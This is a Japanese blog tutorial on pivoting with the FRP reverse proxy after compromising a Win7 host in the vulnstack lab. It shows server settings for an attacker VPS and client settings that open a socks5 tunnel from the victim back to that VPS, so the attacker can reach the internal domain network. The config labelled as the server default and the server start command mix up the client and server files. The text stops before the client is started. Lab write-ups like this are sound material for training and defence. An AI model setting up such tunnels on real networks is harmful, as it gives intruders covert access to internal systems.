代理及び転送のFRP - 肥皂的小屋

イントロダクションと環境#

frpは高性能なリバースプロキシアプリケーションであり、ターゲットのポートを公開し、TCP、HTTP、HTTPS などのプロトコルタイプをサポートしています。また、webサービスはドメインに基づいてルーティング転送をサポートしており、これによりレッドチームの操作中にインターネットを介して内部ネットワークにアクセスできます。

frpは安定して動作するリバースプロキシツールですが、設定ファイルに依存しており、トレースバックが容易です。

この記事は、「ATT&CK 実践 - 紅日セキュリティ vulnstack (1)」の記事で使用された環境を基にしています。

ネットワーク構成の図は以下のようになります：

既知の Win7 が境界機として使用され、シェルが取得されています。
ドメインコントローラホストはリモートアクセスを許可しています。

ここでは、csを事前にオンラインにしていますが、csは直接socksトンネルを一括で開始することもできますが、この記事の範囲外です。

csを使用してターゲットホストwin7のipを確認します。2 つの内部ネットワークセグメントがあります。

FRP プロキシで内部ネットワークにアクセスする#

まず、プロキシフローを明確にする必要があります。

攻撃者のノートブックプログラムがプロキシを使用してドメイン環境内のネットワークにアクセスできる必要があります。

まず、GitHubから対応するバージョンのFRPプロキシプログラムをダウンロードします。

開くと、FRPには各オペレーティングシステムに対応したバージョンのプログラムが用意されています：

ここでは、windows64バージョンを例に説明します。次のファイルが含まれています：

systemd
frpc.exe
frpc.ini
frpc_full.ini
frps.exe
frps.ini
frps_full.ini
LICENSE

同じオペレーティングシステムでは、公式にはserver側とclient側が提供されています。

攻撃者のマシン、つまり公開されたipを持つvpsでまずfrps.iniを設定します。

デフォルトの設定ファイルは次のようになっています：

[common]
server_addr = 127.0.0.1
server_port = 7000

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000

ここでは、最も基本的な設定を紹介します：

[common]
bind_port = 7000
token = 145678

実際には最初の 2 行だけで十分ですが、tokenを追加することをお勧めします。そして、サーバーを起動します：

frps -c frpc.ini

この時点で、ターゲットマシンはvpsに接続するための設定が必要です。また、内部ネットワーク環境にアクセスするためにsocks5トンネルも設定する必要があります。最も簡単な設定は次のようになります：

[common]
server_addr = x.x.x.x
server_port = 7000
token = 145678

[socks1]
type = tcp
remote_port = 6666
plugin = socks5
plugin_user = admin
plugin_passwd = passwd

クライアント側のfrpを起動します：